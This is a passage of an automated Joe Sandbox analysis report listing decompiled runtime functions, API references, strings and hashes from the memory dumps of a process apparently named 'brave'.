memcpy.MSVCRT ref: 00007FF652B4ECD4
memcpy.MSVCRT ref: 00007FF652B4ED90

Strings

basic_string::append, xrefs: 00007FF652B4ED2A, 00007FF652B4EDE8

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 6cebfcec6de9b3593e030ed6678d1432fc8d21d84097160306933d0743cdec40
Instruction ID: cec9f690034048873690906ebe854679c2b9dc8de8dd1939758cc3eccfd0f469
Opcode Fuzzy Hash: 6cebfcec6de9b3593e030ed6678d1432fc8d21d84097160306933d0743cdec40
Instruction Fuzzy Hash: D951A362B19A4590EA10DB15D8848BD2363FB46BCCB9C4632EE9DA73D1EFBDE541C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4BAC0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 158stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF652B4BAD2
memcpy.MSVCRT ref: 00007FF652B4BB22
memcpy.MSVCRT ref: 00007FF652B4BBDD

Strings

basic_string::append, xrefs: 00007FF652B4BB7D, 00007FF652B4BC3B

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: e52a5d2963f204db0f47163310a085c06c72244473eb4e09b667bfb4340310bf
Instruction ID: caeeb2b0c0b089dcb867efff1095f9b3e8ccfef3a0581a8de54c8fc0e1a0f35f
Opcode Fuzzy Hash: e52a5d2963f204db0f47163310a085c06c72244473eb4e09b667bfb4340310bf
Instruction Fuzzy Hash: 9351D163A09A4A80DA20DA15DCD85792375FB47BDCF8C4532EEADA7392DEADD142C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B50290 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B50290(long long* __rcx, void* __rdx) {
				long long _t14;
				signed long long _t16;
				signed long long _t18;
				signed long long _t19;

				_t19 =  *((intOrPtr*)(__rdx + 8));
				_t16 = _t19 + _t19;
				_t14 = __rcx + 0x10;
				_t18 = _t16 >> 1;
				 *__rcx = _t14;
				if (_t16 - 0xe > 0) goto 0x52b50300;
				if (_t18 == 1) goto 0x52b502f0;
				if (_t18 != 0) goto 0x52b502e0;
				 *(__rcx + 8) = _t18;
				 *((short*)(_t14 + _t19 * 2)) = 0;
				return 0;
			}

0x7ff652b5029a
0x7ff652b5029e
0x7ff652b502a9
0x7ff652b502ad
0x7ff652b502b0
0x7ff652b502ba
0x7ff652b502c0
0x7ff652b502c5
0x7ff652b502c9
0x7ff652b502cd
0x7ff652b502db

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B50388, 00007FF652B503DF, 00007FF652B5042F
basic_string::_M_create, xrefs: 00007FF652B50337
string::string, xrefs: 00007FF652B50428
basic_string::basic_string, xrefs: 00007FF652B50381, 00007FF652B503D8

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-126128797
Opcode ID: fa530074e51c7f9f7c906e36678571559d185e73af13ed167796c0c752426d85
Instruction ID: 92361ee38023ac5b9e80975720763b073a56f7048d4ac3184aacab4ad03204b6
Opcode Fuzzy Hash: fa530074e51c7f9f7c906e36678571559d185e73af13ed167796c0c752426d85
Instruction Fuzzy Hash: 6C41C462B05B4695EB109F15DC404AC7360FB19F9CB984A32CA5CAB790FEBDD596C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B50750 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B50750(long long* __rcx, void* __rdx) {
				long long _t14;
				signed long long _t16;
				signed long long _t18;
				signed long long _t19;

				_t19 =  *((intOrPtr*)(__rdx + 8));
				_t16 = _t19 + _t19;
				_t14 = __rcx + 0x10;
				_t18 = _t16 >> 1;
				 *__rcx = _t14;
				if (_t16 - 0xe > 0) goto 0x52b507c0;
				if (_t18 == 1) goto 0x52b507b0;
				if (_t18 != 0) goto 0x52b507a0;
				 *(__rcx + 8) = _t18;
				 *((short*)(_t14 + _t19 * 2)) = 0;
				return 0;
			}

0x7ff652b5075a
0x7ff652b5075e
0x7ff652b50769
0x7ff652b5076d
0x7ff652b50770
0x7ff652b5077a
0x7ff652b50780
0x7ff652b50785
0x7ff652b50789
0x7ff652b5078d
0x7ff652b5079b

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B50848, 00007FF652B5089F, 00007FF652B508EF
basic_string::_M_create, xrefs: 00007FF652B507F7
string::string, xrefs: 00007FF652B508E8
basic_string::basic_string, xrefs: 00007FF652B50841, 00007FF652B50898

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-126128797
Opcode ID: 66f3f228ea3a18784f6c83e61baa3469eb30d59ff27e738029579d98566150f7
Instruction ID: 18cd671842a01116c41f1ee3fe35f9033b4b0680144c0c0075ea9186a07ea857
Opcode Fuzzy Hash: 66f3f228ea3a18784f6c83e61baa3469eb30d59ff27e738029579d98566150f7
Instruction Fuzzy Hash: 1B41B572B05B4594EB509F19DC404AC7360FB19F9CB985A32CA1CAB390FEBDE596C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B30640 Relevance: 7.6, APIs: 5, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B30640(void* __rax, intOrPtr* __rcx, void* __rdx) {
				void* _t4;
				void* _t20;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t24 = __rdx;
				_t20 = __rax;
				_t27 = __rcx;
				if (__rdx == 0) goto 0x52b3066f;
				E00007FF67FF652B37400(_t4, __rdx);
				E00007FF67FF652B373B0(_t20, _t24);
				if (_t20 - _t20 > 0) goto 0x52b306b0;
				_t26 =  *_t27;
				_t1 = _t26 + 3; // 0x3
				if (_t1 - 3 <= 0) goto 0x52b306d1;
				if (_t26 == 0) goto 0x52b306e4;
				r13d = 1;
				 *_t26 = r13d;
				if ( *_t26 != 0) goto 0x52b30708;
				if ( *((intOrPtr*)(_t26 + 4)) != 0) goto 0x52b306f8;
				return 0;
			}

0x7ff652b30640
0x7ff652b30640
0x7ff652b30650
0x7ff652b30659
0x7ff652b3065b
0x7ff652b30665
0x7ff652b3066d
0x7ff652b3066f
0x7ff652b30673
0x7ff652b3067c
0x7ff652b30681
0x7ff652b30683
0x7ff652b3068c
0x7ff652b30692
0x7ff652b3069b
0x7ff652b306aa

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: f49b37cc6554afe07983d2b0d8d35f3757fbd10da3a986622ae24d0176cd62df
Instruction ID: f0652c889a1f088c44dbea04705cb57cd80e4579f0da96e04ffde1a2eb786b14
Opcode Fuzzy Hash: f49b37cc6554afe07983d2b0d8d35f3757fbd10da3a986622ae24d0176cd62df
Instruction Fuzzy Hash: 3F41C122B0826787FE659B259C08A3A3195FF6239CF1C4935DE1CD63C4EEBCA881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B304E0 Relevance: 7.6, APIs: 5, Instructions: 102
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B304E0(intOrPtr* __rcx) {
				intOrPtr* _t16;

				_t16 =  *((intOrPtr*)(__rcx));
				_t1 = _t16 + 3; // 0x3
				if (_t1 - 3 <= 0) goto 0x52b30540;
				if (_t16 == 0) goto 0x52b30550;
				 *_t16 = 1;
				if ( *_t16 != 0) goto 0x52b30560;
				if ( *((intOrPtr*)(_t16 + 4)) != 0) goto 0x52b30520;
				return 0;
			}

0x7ff652b304e9
0x7ff652b304ec
0x7ff652b304f5
0x7ff652b304fa
0x7ff652b30503
0x7ff652b30509
0x7ff652b30512
0x7ff652b3051f

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF652B30520

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: a892f5a888edd9dfb3e980655216f5831920c2c6f9fa8653408e139a634474d4
Instruction ID: a6e3bfa09207fb17cd2b88e573e7cd53cb554365aca4d7965bb6c13d050b9b30
Opcode Fuzzy Hash: a892f5a888edd9dfb3e980655216f5831920c2c6f9fa8653408e139a634474d4
Instruction Fuzzy Hash: 70319223B0921347FF568B249D8976A3194FF517ADF1E4934DE0CD6281EEB8E881C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B352D0 Relevance: 7.6, APIs: 5, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00007FF67FF652B352D0(void* __ecx, void* __rax, long long __rdx) {
				void* _t15;
				void* _t18;
				void* _t20;
				signed long long _t25;

				_t18 = __rax;
				_t15 = __ecx;
				r12d = GetLastError();
				E00007FF67FF652B32D40(__ecx, __rdx);
				_t1 = _t18 + 0x68; // 0x68
				_t20 = _t18;
				E00007FF67FF652B38830(_t1, __rdx);
				if ( *((intOrPtr*)(_t20 + 0x48)) - _t15 <= 0) goto 0x52b35340;
				 *((long long*)( *((intOrPtr*)(_t20 + 0x50)) + _t25 * 8)) = __rdx;
				 *((char*)( *((intOrPtr*)(_t20 + 0x58)) + _t25)) = 1;
				E00007FF67FF652B38870(_t1);
				SetLastError(??);
				return 0;
			}

0x7ff652b352d0
0x7ff652b352e0
0x7ff652b352eb
0x7ff652b352ee
0x7ff652b352f3
0x7ff652b352f7
0x7ff652b352fd
0x7ff652b35305
0x7ff652b3530b
0x7ff652b35316
0x7ff652b3531a
0x7ff652b35322
0x7ff652b3533a

APIs

GetLastError.KERNEL32 ref: 00007FF652B352E5

Part of subcall function 00007FF652B32D40: TlsGetValue.KERNEL32 ref: 00007FF652B32DA0

SetLastError.KERNEL32 ref: 00007FF652B35322
realloc.MSVCRT(00000000,?,?,00007FF652B214F6,00007FF652B302FB,000001AC127317F0,00000000,00007FFA26C83CA0,00007FF652B232FA), ref: 00007FF652B35353
realloc.MSVCRT(00000000,?,?,00007FF652B214F6,00007FF652B302FB,000001AC127317F0,00000000,00007FFA26C83CA0,00007FF652B232FA), ref: 00007FF652B35367
memset.MSVCRT ref: 00007FF652B3539D

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: ErrorLastrealloc$Valuememset
String ID:
API String ID: 2591390167-0
Opcode ID: c1310bef0b37995c8512101a0dfd18a475ef539f0a296ca77da5c8e920a0cdac
Instruction ID: 011c7da4731f4c5c8ce218cf21a37066094c030fbfacab4ed978854c4f629ea1
Opcode Fuzzy Hash: c1310bef0b37995c8512101a0dfd18a475ef539f0a296ca77da5c8e920a0cdac
Instruction Fuzzy Hash: 3221C426B1564186EB149F2A9C4456D3395FF4AB9CF4C0035DD4EA7395EDBCE885C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B38880 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF652B38898
ReleaseSemaphore.KERNEL32 ref: 00007FF652B388C6
LeaveCriticalSection.KERNEL32 ref: 00007FF652B388D3
LeaveCriticalSection.KERNEL32 ref: 00007FF652B388F3
LeaveCriticalSection.KERNEL32 ref: 00007FF652B38918

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CriticalSection$Leave$EnterReleaseSemaphore
String ID:
API String ID: 2813224205-0
Opcode ID: 50ea73615dfd6b47d2567a6e8e39e4969aa7ea6ce91bc3410475d5b7992722e5
Instruction ID: 0a40c0117e1036d280ec3d41700970c458c18878202dc13b319af7dadf7310eb
Opcode Fuzzy Hash: 50ea73615dfd6b47d2567a6e8e39e4969aa7ea6ce91bc3410475d5b7992722e5
Instruction Fuzzy Hash: 3001B523F0561B43E7459B1A7CAA665A251BFA977AF884635CD1D86380DE7C98C68300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2F160 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007FF652B2F1AF
EnterCriticalSection.KERNEL32 ref: 00007FF652B2F1CA
LeaveCriticalSection.KERNEL32 ref: 00007FF652B2F1E9

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF652B2F192
!dso || dso == &__dso_handle, xrefs: 00007FF652B2F199

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeavecalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 876395260-4180103562
Opcode ID: 6df07e8e7846e7046eb75ebaa7f4656fd6ebd82937729c11de18241f8b04cf4c
Instruction ID: f4eff0eee29068fa61c4bb5edc0d245010bce33c3170d364ab353ef462bfe575
Opcode Fuzzy Hash: 6df07e8e7846e7046eb75ebaa7f4656fd6ebd82937729c11de18241f8b04cf4c
Instruction Fuzzy Hash: 4D0135A1F18B0791FB118B55FC445B872A4AF49799F8C4234D91CEB390EEACE985C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B39EC0 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B39EC0(void* __rcx) {

				if (__rcx != 0) goto 0x52b39ed8;
				return 0;
			}

0x7ff652b39ecb
0x7ff652b39ed4

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF652B39ED8
OpenProcess.KERNEL32 ref: 00007FF652B39EEF
CloseHandle.KERNEL32 ref: 00007FF652B39EFD

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen
String ID:
API String ID: 2750122171-0
Opcode ID: 0481b6e7934421b3d5d1405471e27f862e5ab29bd4ffea2d44222b750cc16042
Instruction ID: 9f2df34312951a2c71cdc9c3b90dedf36c8915b4abc46293bfc52b3b000c6612
Opcode Fuzzy Hash: 0481b6e7934421b3d5d1405471e27f862e5ab29bd4ffea2d44222b750cc16042
Instruction Fuzzy Hash: 22F05421A19D1787FB155F715CD813962D0AF5571DF0C1B34C52EE52D4DEBC64884620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2EB03 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00007FF67FF652B2EB03() {
				signed int _t8;
				void* _t12;
				void* _t17;
				signed int** _t20;

				asm("stc");
				 *((intOrPtr*)(_t17 + 0x41909090)) =  *((intOrPtr*)(_t17 + 0x41909090)) + _t12;
				_t8 =  *( *_t20);
				if ((_t8 & 0x20ffffff) == 0x20474343) goto 0x52b2ebf0;
				if (_t8 - 0xc0000096 > 0) goto 0x52b2ebd7;
				if (_t8 - 0xc000008b <= 0) goto 0x52b2eb88;
				if (_t8 + 0x3fffff73 - 9 > 0) goto 0x52b2eb78;
				goto __rax;
			}

0x7ff652b2eb03
0x7ff652b2eb0b
0x7ff652b2eb19
0x7ff652b2eb2c
0x7ff652b2eb37
0x7ff652b2eb42
0x7ff652b2eb4c
0x7ff652b2eb5c

APIs

signal.MSVCRT ref: 00007FF652B2EBAA

Strings

CCG , xrefs: 00007FF652B2EB26

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 46604ae227c626b1be511848d822de1d4529c5c54d514a26e591d6aa839660e6
Instruction ID: e5dd77bb7224c78b47eb00ea95829167e7d27515f59d6525a30cf949a41687b6
Opcode Fuzzy Hash: 46604ae227c626b1be511848d822de1d4529c5c54d514a26e591d6aa839660e6
Instruction Fuzzy Hash: 6221A0A2E0860201FA65426A8C9937811C29F4B36CF1C4B36D52EE67E5DDAEF8818311

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B33D00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
threadCOMMON

